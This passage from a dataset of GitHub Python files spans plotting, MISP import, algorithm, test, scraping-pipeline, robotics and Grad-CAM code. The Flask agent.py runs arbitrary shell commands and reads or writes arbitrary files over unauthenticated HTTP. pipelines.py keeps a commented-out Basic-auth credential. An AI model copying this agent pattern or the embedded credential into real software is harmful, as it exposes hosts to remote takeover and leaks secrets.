Shape the data.\ntroop_positions = pd.read_fwf(\"../../data/napoloen/troops.txt\")\ntroop_positions = gpd.GeoDataFrame(data=troop_positions,\n geometry=troop_positions\\\n .apply(lambda srs: Point(srs['long'], srs['lat']),\n axis='columns'))\n\nsubsrs = []\nfor a, b in zip(range(len(troop_positions) - 1), range(1, len(troop_positions))):\n srs = troop_positions.iloc[b]\n srs = srs.rename({'geometry': 'from'})\n 
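# pair each point with the one before it so every row carries a from/to movement segment\n    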
srs['to'] = troop_positions.iloc[a].geometry\n subsrs.append(srs)\ntroop_movements = pd.concat(subsrs, axis=1).T\ntroop_movements = troop_movements[['survivors', 'direction', 'group', 'from', 'to']]\ntroop_movements['direction'] = troop_movements.direction.map(lambda d: 0 if d == 'A' else 1)\n\n\n# Plot the data.\n\n# We'll use a custom colormap, to match the one that Minard uses.\nfrom matplotlib.colors import LinearSegmentedColormap\ncolors = [(215/255, 193/255, 126/255), (37/255, 37/255, 37/255)]\ncm = LinearSegmentedColormap.from_list('minard', colors)\n\n\ngplt.sankey(troop_movements, start='from', end='to',\n scale='survivors', limits=(0.5, 45),\n hue='direction', categorical=True, cmap=cm)\nfig = plt.gcf()\nmplleaflet.save_html(fig, fileobj='minard-napoleon-russia.html')","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/ResidentMario_geoplot/geoplot-master/docs/examples/minard-napoloen-russia.py","file_name":"minard-napoloen-russia.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"23970154525","text":"# -*- coding: utf-8 -*-\nimport json, os, base64\nimport pymisp\n\nmisperrors = {'error': 'Error'}\nmispattributes = {'inputSource': ['file'], 'output': ['MISP attributes']}\nmoduleinfo = {'version': '0.1', 'author': 'Christian Studer',\n 'description': 'Import Attributes from a csv file.',\n 'module-type': ['import']}\nmoduleconfig = ['header']\n\nduplicatedFields = {'mispType': {'mispComment': 'comment'},\n 'attrField': {'attrComment': 'comment'}}\n\nclass CsvParser():\n def __init__(self, header):\n self.header = header\n self.attributes = []\n\n def parse_data(self, data):\n return_data = []\n for line in data:\n l = line.split('#')[0].strip() if '#' in line else line.strip()\n if l:\n return_data.append(l)\n self.data = return_data\n # find which delimiter is used\n self.delimiter, self.length = self.findDelimiter()\n\n def findDelimiter(self):\n n = len(self.header)\n if n > 1:\n tmpData = []\n for da in self.data:\n tmp = []\n for d in (';', '|', '/', ',', '\\t', ' ',):\n if da.count(d) == (n-1):\n tmp.append(d)\n if len(tmp) == 1 and tmp == tmpData:\n return tmpData[0], n\n else:\n tmpData = tmp\n else:\n return None, 1\n\n def buildAttributes(self):\n # if there is only 1 field of data\n if self.delimiter is None:\n mispType = self.header[0]\n for data in self.data:\n d = data.strip()\n if d:\n self.attributes.append({'types': mispType, 'values': d})\n else:\n # split fields that should be recognized as misp attribute types from the others\n list2pop, misp, head = self.findMispTypes()\n # for each line of data\n for data in self.data:\n datamisp = []\n datasplit = data.split(self.delimiter)\n # in case there is an empty line or an error\n if len(datasplit) != self.length:\n continue\n # pop from the line data that matches with a misp type, using the list of indexes\n for l in list2pop:\n datamisp.append(datasplit.pop(l).strip())\n # for each misp type, we create an attribute\n for m, dm in zip(misp, datamisp):\n attribute = {'types': m, 'values': dm}\n for h, ds in zip(head, datasplit):\n if h:\n attribute[h] = ds.strip()\n self.attributes.append(attribute)\n\n def findMispTypes(self):\n descFilename = os.path.join(pymisp.__path__[0], 'data/describeTypes.json')\n with open(descFilename, 'r') as f:\n MispTypes = json.loads(f.read())['result'].get('types')\n list2pop = []\n misp = []\n head = []\n for h in reversed(self.header):\n n = self.header.index(h)\n # 
fields that are misp attribute types\n            if h in MispTypes:\n                list2pop.append(n)\n                misp.append(h)\n            # handle confusions between misp attribute types and attribute fields\n            elif h in duplicatedFields['mispType']:\n                # fields that should be considered as misp attribute types\n                list2pop.append(n)\n                misp.append(duplicatedFields['mispType'].get(h))\n            elif h in duplicatedFields['attrField']:\n                # fields that should be considered as attribute fields\n                head.append(duplicatedFields['attrField'].get(h))\n            # otherwise, it is an attribute field\n            else:\n                head.append(h)\n        # return list of indexes of the misp types, list of the misp types, remaining fields that will be attribute fields\n        return list2pop, misp, list(reversed(head))\n\ndef handler(q=False):\n    if q is False:\n        return False\n    request = json.loads(q)\n    if request.get('data'):\n        data = base64.b64decode(request['data']).decode('utf-8')\n    else:\n        misperrors['error'] = \"Unsupported attributes type\"\n        return misperrors\n    if not request.get('config') or not request['config'].get('header'):\n        misperrors['error'] = \"Configuration error\"\n        return misperrors\n    config = request['config'].get('header').split(',')\n    config = [c.strip() for c in config]\n    csv_parser = CsvParser(config)\n    csv_parser.parse_data(data.split('\\n'))\n    # build the attributes\n    csv_parser.buildAttributes()\n    r = {'results': csv_parser.attributes}\n    return r\n\ndef introspection():\n    return mispattributes\n\ndef version():\n    moduleinfo['config'] = moduleconfig\n    return moduleinfo\n","repo_name":"truckydev/misp-modules","sub_path":"misp_modules/modules/import_mod/csvimport.py","file_name":"csvimport.py","file_ext":"py","file_size_in_byte":4901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"}
{"seq_id":"16027200714","text":"# Prime path, G4, graph, sieve of Eratosthenes\nfrom sys import stdin\nfrom collections import deque\n\ndef findPrime():\n    # sieve of Eratosthenes (sieving up to the square-root range)\n    for i in range(2, 100):\n        # multiples must be marked while the number is still flagged prime\n        if prime[i] == True:\n            # mark the multiples of this prime\n            for j in range(2*i, 10000, i):\n                prime[j] = False\n\ndef bfs(a,b):\n    q = deque()\n    q.append([a, 0])\n    visited = [0 for _ in range(10000)]\n    visited[a] = 1\n    while q:\n        now, cnt = q.popleft()\n        strNow = str(now)\n        if now == b:\n            return cnt\n        for i in range(4):\n            for j in range(10):\n                tmp = int(strNow[:i] + str(j) + strNow[i+1:])\n                if visited[tmp] == 0 and prime[tmp] and tmp > 999:\n                    visited[tmp] = 1\n                    q.append([tmp, cnt + 1])\n\nT = int(stdin.readline())\n\nprime = [True for _ in range(10000)]\nfindPrime()\n\nfor _ in range(T):\n    a, b = map(int, stdin.readline().split())\n    res = bfs(a,b)\n    print(res if res != None else \"Impossible\")","repo_name":"lookinmin/CodingTest","sub_path":"그래프/BOJ_1963.py","file_name":"BOJ_1963.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"6482375932","text":"from pathlib import Path\n\nimport pytest\n\nimport exam2pdf.rlwrapper\nfrom exam2pdf.rlwrapper import get_std_aspect_image\n\n\ndef test_get_image_error(mocker):\n    \"\"\"Argument size invalid.\"\"\"\n    # Arrange\n    # Mock where it is used, and not where it’s defined (source)\n    mocker.patch(\n        \"exam2pdf.rlwrapper.get_image_size\", return_value=(1, 1)\n    )  # my function is mocked\n    mocker.patch(\n        \"exam2pdf.rlwrapper.platypus.Image\"\n    )  # library is mocked, Don’t Mock What You Don’t Own\n\n    # Act, Assert\n    with pytest.raises(ValueError):\n        get_std_aspect_image(Path(\"any file\"), size=\"hello world\")\n\n\ndef 
test_get_image_x1(mocker):\n \"\"\"Test half size image.\"\"\"\n # Arrange\n # Mock where it is used, and not where it’s defined (source)\n # In both cases I mocked my functions\n mocker.patch(\"exam2pdf.rlwrapper.get_image_size\", return_value=(1, 1))\n mocked_get_RL_image = mocker.patch.object(\n exam2pdf.rlwrapper, \"get_RL_image\"\n )\n\n # Act\n get_std_aspect_image(Path(\"any file\"), size=\"x 1\")\n\n # Assert\n mocked_get_RL_image.assert_called_once_with(\n Path(\"any file\"), width=1, height=1\n )\n\n\ndef test_get_image_x05(mocker):\n \"\"\"Test half size image.\"\"\"\n # Arrange\n\n # Mock where it is used, and not where it’s defined (source)\n # This time, as exercise see Stackoverflow 3 July my question, library is mocked,\n mock_image_reader = mocker.patch(\n \"exam2pdf.rlwrapper.utils.ImageReader\", spec_set=True\n )\n mock_image_reader.return_value.getSize.return_value = 1, 1\n\n mocker.patch(\"exam2pdf.rlwrapper.platypus.Image\")\n\n # Act\n get_std_aspect_image(Path(\"aabbcc\"), size=\"x 0.5\")\n\n # Assert\n exam2pdf.rlwrapper.platypus.Image.assert_called_once_with(\n Path(\"aabbcc\"), width=0.5, height=0.5\n )\n\n\ndef test_get_image_w(mocker):\n \"\"\"Test width 2: 2 * 0.5 mm = 1\"\"\"\n mocker.patch(\"exam2pdf.rlwrapper.get_image_size\", return_value=(1, 1))\n mocked = mocker.patch.object(exam2pdf.rlwrapper, \"get_RL_image\")\n mocker.patch.object(exam2pdf.rlwrapper, \"mm\", 0.5)\n get_std_aspect_image(Path(\"any file\"), size=\"w 2\")\n mocked.assert_called_once_with(Path(\"any file\"), width=1, height=1)\n\n\ndef test_get_image_h(mocker):\n \"\"\" \"Test height 3: 3 * 0.5 mm = 1.5\"\"\"\n mocker.patch(\"exam2pdf.rlwrapper.get_image_size\", return_value=(1, 1))\n mocked = mocker.patch.object(exam2pdf.rlwrapper, \"get_RL_image\")\n mocker.patch.object(exam2pdf.rlwrapper, \"mm\", 0.5)\n get_std_aspect_image(Path(\"any file\"), size=\"height3\")\n mocked.assert_called_once_with(Path(\"any file\"), width=1.5, height=1.5)\n","repo_name":"agossino/exam2pdf","sub_path":"tests/unit/test_rlwrapper.py","file_name":"test_rlwrapper.py","file_ext":"py","file_size_in_byte":2627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18288589478","text":"import boto3\nimport datetime\nimport hashlib\nimport pdfkit\nimport sqlite3\nimport json\nimport time\nimport logging\nimport requests\nfrom crawlerapp.models import Movies,ProjectDetail\n\n\npath=r'C:\\Program Files\\wkhtmltopdf\\bin\\wkhtmltopdf.exe'\nconfig = pdfkit.configuration(wkhtmltopdf=path)\nfrom botocore.client import Config\n\nfrom .settings import AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, FILE_PATH, DB_PATH\n\nfrom .html_format import html_format_t\n\nlogger = logging.getLogger()\n\n\nclass ScrappingapplicationPipeline:\n must_haves = [\n # 'title', 'production_companies', 'locations'\n ]\n def process_item(self, item, spider):\n for field in self.must_haves:\n if not item.get(field):\n logger.warning(f'Droping item because {field} is not available!')\n return {}\n \n return item\n\n\n# This pipeline takes the Item and convert it into PDF and save content in DB\nclass ScrappingSqLitePipeline(object):\n # Take the item and put it in database - do not allow duplicates\n def process_item(self, item, spider):\n moviev=Movies()\n project=ProjectDetail()\n moviev.title=item['title']\n id=moviev.save()\n print(\"iddd\")\n print(id)\n item=self.fix_movie_info(item)\n if 'issue_num' in item:\n if item['issue_num']==\"\":\n item['issue_num']=id\n 
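# look up an existing project with the same title so only its empty fields get filled in\n        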
result=ProjectDetail.objects.filter(title=item['title'])\n if len(result)>0:\n for feild in ProjectDetail._meta.get_fields():\n if getattr(result[0], feild.name) == None or getattr(result[0], feild.name) == [] or getattr(result[0],feild.name) == '[\"\"]' or getattr(result[0], feild.name) == \"\" or getattr(result[0], feild.name) == \"N/A\":\n print(feild.name)\n if item[feild.name]!=None or item[feild.name]!=[\"\"] or item[feild.name]!=[] or item[feild.name]!='[\"\"]' or item[feild.name]!=\"\":\n if feild.name == 'project_id':\n if 'id' in item:\n setattr(result[0], 'project_id', item['id'])\n else:\n setattr(result[0], 'project_id', id)\n else:\n setattr(result[0],feild.name,item[feild.name])\n result[0].save()\n else:\n with open('ScrappingApplication/findfilmwork.json') as f:\n data = json.load(f)\n output_dict = [x for x in data if x['title'] == item['title']]\n if len(output_dict)>0:\n filmdata=output_dict[0]\n print(filmdata)\n project=ProjectDetail()\n for field in ProjectDetail._meta.get_fields():\n if len(output_dict)>0:\n print(\"function call\")\n if field.name == 'project_id':\n setattr(project, 'project_id', filmdata['id'])\n else:\n if field.name in filmdata:\n setattr(project, field.name, filmdata[field.name])\n else:\n if field.name in item:\n if field.name=='project_id':\n if 'id' in item:\n setattr(project, 'project_id', item['id'])\n else:\n setattr(project, 'project_id', id)\n else:\n if isinstance(item[field.name],list):\n setattr(project,field.name,json.dumps(item[field.name]))\n else:\n setattr(project,field.name,item[field.name])\n project.save()\n # item['issue_num'] = id\n # project.url=item['url']\n # project.project_id=item['id']\n # project.title=item['title']\n # project.aka_title=item['aka_title']\n # project.project_type=item['project_type']\n # project.project_issue_date=item['project_issue_date']\n # project.project_issue_date1=item['project_issue_date1']\n # project.project_start_date=item['project_start_date']\n # if 'project_update' in item:\n # project.project_update=item['project_update']\n # project.locations=json.dumps(item['locations'])\n # project.photography_start_date=item['photography_start_date']\n # project.writers=json.dumps(item['writers'])\n # project.directors=json.dumps(item['directors'])\n # project.cast=json.dumps(item['cast'])\n # project.producers=json.dumps(item['producers'])\n # project.production_companies=json.dumps(item['production_companies'])\n # project.studios=json.dumps(item['studios'])\n # project.plot=item['plot'][0]\n # project.genres=json.dumps(item['genres'])\n # if 'project_notes' in item:\n # project.project_notes=str(item['project_notes'])\n # project.release_date=item['release_date']\n # project.start_wrap_schedule=item['start_wrap_schedule']\n # project.issue_num=item['issue_num']\n # project.save()\n # logger.info(\"Item saved in db!\")\n # print(\"items\")\n time.sleep(3)\n print(item)\n return item\n\n def fix_movie_info(self, movie):\n new_movie = movie.copy()\n\n if not movie.get('project_issue_date'):\n new_movie['project_issue_date'] = movie.get('release_date', 'N\\A')\n\n if not new_movie.get('project_start_date'):\n new_movie['project_start_date'] = movie.get('project_issue_date', 'N\\A')\n\n current_date = datetime.datetime.now().strftime('%d %B %Y')\n new_movie['project_issue_date1'] = movie.get('project_issue_date', 'N\\A')\n new_movie['batch_no'] = hashlib.sha224(str(current_date).encode('utf-8')).hexdigest()[:8]\n new_movie['letter_creation_date'] = current_date\n\n return new_movie\n\n\n\nclass 
ScrappingPDFGeneratorPipeline:\n fields_to_end_with_br = [\n 'genres','locations', 'producers',\n 'writers', 'directors', 'cast'\n ]\n fields_to_join = [\n (',', 'plot'),\n (' -', 'cast'),\n (',', 'genres'), \n (' -', 'studios'), \n (' -', 'writers'),\n (' -', 'directors'),\n (' -', 'producers'),\n (' -', 'locations'),\n (',', 'production_companies'),\n \n ]\n\n def join_fields(self, value, joiner):\n if isinstance(value, list):\n return f'{joiner} '.join(value)\n return value\n \n def fix_movie_info(self, movie):\n new_movie = movie.copy()\n \n if not movie.get('project_issue_date'):\n new_movie['project_issue_date'] = movie.get('release_date', 'N\\A')\n\n if not new_movie.get('project_start_date'):\n new_movie['project_start_date'] = movie.get('project_issue_date', 'N\\A')\n \n current_date = datetime.datetime.now().strftime('%d %B %Y')\n new_movie['project_issue_date1'] = movie.get('project_issue_date', 'N\\A')\n new_movie['batch_no'] = hashlib.sha224(str(current_date).encode('utf-8')).hexdigest()[:8]\n new_movie['letter_creation_date'] = current_date\n \n return new_movie\n\n def upload_file(self, file_path, file_name):\n end_point_url = 'https://s3.eu-west-2.amazonaws.com'\n credentials = {\n 'aws_access_key_id': AWS_ACCESS_KEY_ID, \n 'aws_secret_access_key': AWS_SECRET_ACCESS_KEY\n }\n s3_client = boto3.client('s3', region_name='eu-west-2', endpoint_url=end_point_url, config=Config(signature_version='s3v4'), **credentials)\n \n try:\n with open(file_path, \"rb\") as f:\n s3_client.upload_fileobj(f, \"wppdfupload\", file_name)\n\n # response = requests.post(url=resp, files={file_name: open(file_path, 'rb')})\n logger.info(\"Uploading file Successfully on S3 bucket\")\n \n file_url_on_s3 = f'https://wppdfupload.s3.amazonaws.com/{file_name}'\n logger.info(\"URL is Generated!\")\n\n req_url = \"https://productiontelegram.com/wp-json/api-k/v1/pdf-links/\"\n headers = {}\n headers['Content-Type'] = \"application/json\"\n # headers['Authorization'] = \"Basic dGhlbWFjaGluZTpDdW1ZVmFCYnJQNHQ2S21tRWtZNUdOd3Y=\"\n headers['cache-control'] = \"no-cache\"\n # headers['Postman-Token'] = \"ab5a85de-2184-4b07-9d72-8016f6786735\"\n \n \n payload = {}\n payload['file_name'] = file_name\n payload['file_link'] = file_url_on_s3\n payload['description'] = 'N/A'\n # payload = f\"{{\\n\\t\\\"file_name\\\": \\\"{file_name}\\\",\\n\\t\\\"file_link\\\": \\\"{signed_url}\\\",\\n\\t\\\"description\\\": \\\"Testing file\\\"\\n}}\"\n \n r = requests.post(url=req_url, data=json.dumps(payload), headers=headers)\n \n if r.status_code == 200:\n logger.info(\"Uploading file Successfully on Website!\")\n return True\n logger.warning(\"Uploading file Unsuccessfully\")\n except Exception as e:\n return False\n\n def process_item(self, item, spider):\n if not item:\n return {}\n \n movie = item.copy()\n\n for joiner, field in self.fields_to_join:\n movie[field] = self.join_fields(movie[field], joiner)\n\n for field in self.fields_to_end_with_br:\n if movie[field]:\n movie[field] = f'{movie[field]}
<br>'\n\n        \n        name_hash = hashlib.sha224(str(item['title']).encode('utf-8')).hexdigest()[:8]\n        file_name = f'{name_hash}.pdf'\n        file_path = f'{FILE_PATH}/{file_name}'\n        \n        movie['listing'] = name_hash\n\n        movie = self.fix_movie_info(movie)\n        \n        html = html_format_t.format(**movie)\n        pdfkit.from_string(html, file_path, configuration=config)\n\n        if self.upload_file(file_path, file_name):\n            logger.info(\"Uploading file Successfully\")\n        else:\n            logger.warning(\"Uploading file Unsuccessfully\")\n\n        return item\n","repo_name":"Ahmadch101/webcrawler","sub_path":"ScrappingApplication/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":10256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"190616482","text":"from flask import Flask, jsonify, request\nfrom flask import send_file, send_from_directory\nimport json\nimport subprocess\nfrom subprocess import PIPE, STDOUT\nimport threading\nimport requests\nimport os\nimport time\nimport copy\nimport redis\nimport re\n\napp = Flask(__name__)\n\nBASE_URL = '/api/v1/'\n\nagent_finish_flag = \"Agent Command Execution Finished\"\n\nbase_dir = os.path.dirname(__file__)\nstdout_log_file_pattern = os.path.join(base_dir, \"log\", \"{}-out.log\")\n\nglobal_task_id = 0\ntask_list = dict()\n\n\nclass RealTimeLog:\n    def __init__(self, log_file_fd, redis_url=None, log_key=None, skip_if_matchs=None):\n        '''\n        set skip_if_match = [\"^Progress \\\(\\\d\\\):\"] if run mvn command\n        '''\n\n        self._client = None\n        self.skip_if_matchs = list()\n        for mat in (skip_if_matchs or []):\n            self.skip_if_matchs.append(re.compile(mat))\n\n        if redis_url and log_key:\n            self.redis_url = redis_url\n            if log_key.find(\"agent_log:\") == -1:\n                log_key = \"agent_log:{}\".format(log_key)\n            self.log_key = log_key\n            self._ttl = 12 * 60 * 60\n            # self._pool = redis.ConnectionPool.from_url(redis_url)\n            # self._client = redis.StrictRedis(connection_pool=self._pool)\n            self._client = redis.from_url(redis_url)\n            try:\n                self._client.ping()\n            except:\n                print(\"Redis is unreachable!! 
Redis real-time log is disabled!!\")\n self._client = None\n self.log_file_fd = log_file_fd\n\n if self._client:\n self._client.rpush(self.log_key, \"Start\")\n self.log_file_fd.write(\"Start\\n\")\n\n def refresh_expire_time(self):\n if self._client:\n self._client.expire(self.log_key, self._ttl)\n\n def write_redis(self, line):\n if self._client:\n self._client.rpush(self.log_key, line)\n\n def write_log(self, lines):\n try:\n if not isinstance(lines, list):\n lines = [lines]\n for line in lines:\n if isinstance(line, bytes):\n line = line.decode()\n line = line.strip()\n skip = False\n for re_mat in self.skip_if_matchs:\n if re_mat.match(line):\n skip = True\n break\n if skip is True:\n continue\n self.write_redis(line)\n self.log_file_fd.write(line+\"\\n\")\n except Exception as e:\n print(e)\n\n\ndef callback(task_id, url, body, retry=True):\n headers = {'Content-Type': 'application/json'}\n count_left = 20\n interval = 6\n while True:\n stop = False\n try:\n _response = requests.post(url, json=body, headers=headers, timeout=10)\n task_list[task_id][\"callback_status\"] = _response.status_code\n if _response.status_code / 100 == 2:\n stop = True\n elif _response.status_code / 100 == 4:\n stop = True\n except Exception as e:\n print(\"Can not send call back: {}\".format(e))\n task_list[task_id][\"callback_status\"] = str(e)\n finally:\n if not retry:\n break\n if stop:\n break\n if count_left <= 0:\n break\n count_left -= 1\n time.sleep(interval)\n\n\ndef read_log_file(path, offset=0, count=None):\n file_size = os.path.getsize(path)\n if isinstance(offset, bytes):\n offset = int(offset.decode())\n elif isinstance(offset, str):\n offset = int(offset)\n if not count:\n count = file_size - offset\n elif isinstance(count, bytes):\n count = int(count.decode())\n elif isinstance(count, str):\n count = int(count)\n\n log_list = list()\n recv_size = 0\n\n with open(path, 'r') as o:\n if offset:\n o.seek(offset)\n unit_size = 1024 if count > 1024 else count\n d = o.read(unit_size)\n while d:\n if isinstance(d, bytes):\n d = d.decode()\n log_list.append(d)\n recv_size += len(d)\n if recv_size >= count:\n break\n d = o.read(unit_size)\n return \"\".join(log_list)\n\n\ndef run_thread(task_id, command, callback_url):\n log_redis_key = task_list[task_id].get(\"log_redis_key\", None)\n log_redis_url = task_list[task_id].get(\"log_redis_url\", None)\n stdout_log_file = stdout_log_file_pattern.format(task_id)\n task_list[task_id][\"stdout_file\"] = stdout_log_file\n outfile = open(stdout_log_file, 'w')\n realtime_logger = RealTimeLog(outfile, log_redis_url, log_redis_key)\n\n process = subprocess.Popen(command, stdin=PIPE, stdout=PIPE,\n stderr=STDOUT, shell=True, bufsize=0,\n universal_newlines=True)\n # return_code = child.wait(timeout=12*60*60)\n\n while True:\n output = process.stdout.readline()\n if not output and process.poll() is not None:\n break\n if output:\n # print(\"{} stdout: {}\".format(time.time(), output))\n realtime_logger.write_log(output)\n\n return_code = process.wait()\n\n realtime_logger.write_log(agent_finish_flag)\n realtime_logger.refresh_expire_time()\n outfile.flush()\n outfile.close()\n\n print(\"Command return code: {}\".format(return_code))\n task_list[task_id][\"status\"] = \"done\"\n task_list[task_id][\"return_code\"] = return_code\n task_list[task_id][\"finish_time\"] = time.time()\n task_list[task_id][\"duration\"] = task_list[task_id][\"finish_time\"] - \\\n task_list[task_id][\"start_time\"]\n\n out_log = read_log_file(stdout_log_file)\n if return_code != 0:\n 
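# keep a longer log tail for the callback when the command failed\n        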
out_log = out_log[-4000:]\n else:\n out_log = out_log[-1000:]\n\n if callback_url:\n cb_body = {\n \"return_code\": return_code,\n \"stdout\": out_log,\n \"extra\": task_list[task_id][\"extra\"],\n \"key\": task_list[task_id][\"key\"],\n \"duration\": task_list[task_id][\"duration\"]\n }\n if realtime_logger:\n cb_body[\"log_key\"] = log_redis_key\n callback(task_id, callback_url, cb_body)\n\n\ndef handle_task(command, callback_url, extra, key,\n log_redis_key, log_redis_url):\n global global_task_id\n global_task_id += 1\n t_id = global_task_id\n task_list[t_id] = dict()\n task_list[t_id][\"task_id\"] = t_id\n task_list[t_id][\"command\"] = command\n task_list[t_id][\"extra\"] = extra\n task_list[t_id][\"key\"] = key\n task_list[t_id][\"callback_url\"] = callback_url\n task_list[t_id][\"status\"] = \"doing\"\n task_list[t_id][\"start_time\"] = time.time()\n if log_redis_key and log_redis_url:\n task_list[t_id][\"log_redis_key\"] = log_redis_key\n task_list[t_id][\"log_redis_url\"] = log_redis_url\n\n t = threading.Thread(target=run_thread,\n args=(t_id, command, callback_url))\n t.start()\n t.setName(\"Handle_task_{}\".format(t_id))\n print(t.getName())\n task_list[t_id][\"thread_name\"] = t.getName()\n return t_id\n\n\n@app.route(BASE_URL + 'tasks', methods=['GET', 'POST'])\ndef tasks():\n if request.method == 'GET':\n global task_list\n t_id = request.args.get(\"task_id\", None)\n offset = request.args.get(\"offset\", 0)\n count = request.args.get(\"count\", None)\n if t_id:\n t_id = int(t_id)\n info = copy.deepcopy(task_list[t_id])\n info[\"stdout\"] = read_log_file(info[\"stdout_file\"],\n offset, count)\n resp = {t_id: info}\n else:\n resp = task_list\n return jsonify(resp), 200\n\n elif request.method == 'POST':\n body = request.json\n if not body and request.data:\n print(request.data)\n body = json.loads(request.data)\n print(body)\n if not body:\n resp = {\n \"status\": \"error\",\n \"info\": \"No request body!!\"\n }\n return jsonify(resp), 400\n\n callback_url = body.get(\"callback_url\", None)\n command = body.get(\"command\", None)\n key = body.get(\"key\", None)\n extra = body.get(\"extra\", None)\n log_redis_key = body.get(\"log_redis_key\", key)\n log_redis_url = body.get(\"log_redis_url\", None)\n\n if not command:\n resp = {\n \"status\": \"error\",\n \"info\": \"No command!!\"\n }\n return jsonify(resp), 400\n\n t_id = handle_task(command, callback_url, extra, key,\n log_redis_key, log_redis_url)\n resp = {\n \"status\": \"created\",\n \"task_id\": t_id\n }\n return jsonify(resp), 201\n\n\n@app.route(BASE_URL + 'file', methods=['GET', 'POST'])\ndef file():\n if request.method == 'GET':\n file_path = request.args.get(\"file_path\", None)\n if not file_path:\n resp = {\n \"status\": \"error\",\n \"info\": \"No file_path!!\"\n }\n return jsonify(resp), 400\n if not os.path.isfile(file_path):\n resp = {\n \"status\": \"error\",\n \"info\": \"file {} not found in agent fs!!\".format(file_path)\n }\n return jsonify(resp), 404\n\n\n file_dir = os.path.dirname(file_path)\n file_name = os.path.basename(file_path)\n return send_from_directory(file_dir, file_name, as_attachment=True)\n\n elif request.method == 'POST':\n file = request.files['file']\n target_path = request.form.get(\"target_path\", None)\n if not target_path:\n resp = {\n \"status\": \"error\",\n \"info\": \"No target_path!!\"\n }\n return jsonify(resp), 400\n\n print(request.files)\n file.save(target_path)\n resp = {\n \"status\": \"success\"\n }\n return jsonify(resp), 201\n\n\nif __name__ == '__main__':\n 
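# bind to all interfaces so remote controllers can reach the agent\n    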
app.run(host=\"0.0.0.0\", port=5000, debug=False)\n","repo_name":"GodQ/py-rest-agent","sub_path":"agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":10121,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"41790463027","text":"#!/usr/bin/env python3\n\nimport RPi.GPIO as GPIO\nimport time\n#from aiy.vision.pins import PIN_A\nfrom aiy.vision.pins import (PIN_A, PIN_B, PIN_C, PIN_D)\n\nGPIO.setmode(GPIO.BOARD)\n\ncontrol_pins = [PIN_A,PIN_B,PIN_C,PIN_D]\n\nfor pin in control_pins:\n\tGPIO.setup(pin, GPIO.OUT)\n\tGPIO.output(pin,0)\n\nhalfstep_seq = [\n\t[1,0,0,0],\n\t[1,1,0,0],\n\t[0,1,0,0],\n\t[0,1,1,0],\n\t[0,0,1,0],\n\t[0,0,1,1],\n\t[0,0,0,1],\n\t[1,0,0,1]\n]\n\nfor i in range(512):\n\tfor halfstep in range(8):\n\t\tfor pin in range(4):\n\t\t\tGPIO.output(control_pins[pin], halfstep_seq[halfstep][pin])\n\t\ttime.sleep(0.001)\n\nGPIO.cleanup()\n\n\n","repo_name":"AlanWilms/iTracking","sub_path":"iTracking/gpiozero/test_stepper.py","file_name":"test_stepper.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"40432191140","text":"import torch\nimport torch.nn as nn\n\nfrom pathlib import Path\n\nfrom eval.visualization_functions import save_class_activation_images\n\nfrom eval.gradcam import GradCam\n\nfrom PIL import Image\n\nfrom torchvision.datasets import CIFAR100\nfrom torchvision.transforms import ToTensor\nfrom torch.utils.data import DataLoader\n\nfrom models.resnet import resnet34_cifar100\n\n\ndef load_model(model, ckpt_dir):\n assert isinstance(model, nn.Module)\n save_dict = torch.load(ckpt_dir)\n model.load_state_dict(save_dict['model_state_dict'])\n\n\ndef make_grad_cam_imgs(model, name, data_root=None):\n assert isinstance(model, nn.Module)\n\n grad_cam = GradCam(model, target_layer='layer4', target_conv='conv2')\n\n data_root = '/home/veritas/PycharmProjects/PA1/data'\n\n val_dataset = CIFAR100(root=data_root, train=False)\n\n for idx, (image, target) in enumerate(val_dataset, start=1):\n print(target)\n tensor = (ToTensor()(image)).unsqueeze(dim=0)\n print(tensor.shape)\n cam = grad_cam.generate_cam(input_image=tensor, target_class=target)\n save_class_activation_images(org_img=image, activation_map=cam, file_name=f'{name}_{idx:02d}')\n\n if idx >= 10:\n break\n\n\ndef main():\n resnet = resnet34_cifar100()\n ckpt_dir = '/home/veritas/PycharmProjects/PA1/checkpoints/Trial 01 2019-05-10 00-00-27/ckpt_018.tar'\n load_model(resnet, ckpt_dir)\n make_grad_cam_imgs(resnet, name='resnet34')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"veritas9872/PA1","sub_path":"eval/use_gradcam.py","file_name":"use_gradcam.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71265093547","text":"from jinja2.utils import contextfunction\n\nfrom shoop.core.models import (\n AttributeVisibility, Product, ProductAttribute, ProductCrossSell,\n ProductCrossSellType\n)\n\n\ndef get_visible_attributes(product):\n return ProductAttribute.objects.filter(\n product=product,\n attribute__visibility_mode=AttributeVisibility.SHOW_ON_PRODUCT_PAGE\n )\n\n\n# Deprecated, see `get_product_cross_sells()`\n@contextfunction\ndef get_products_bought_with(context, product, count=5):\n related_product_cross_sells = (\n ProductCrossSell.objects\n .filter(product1=product, type=ProductCrossSellType.COMPUTED)\n 
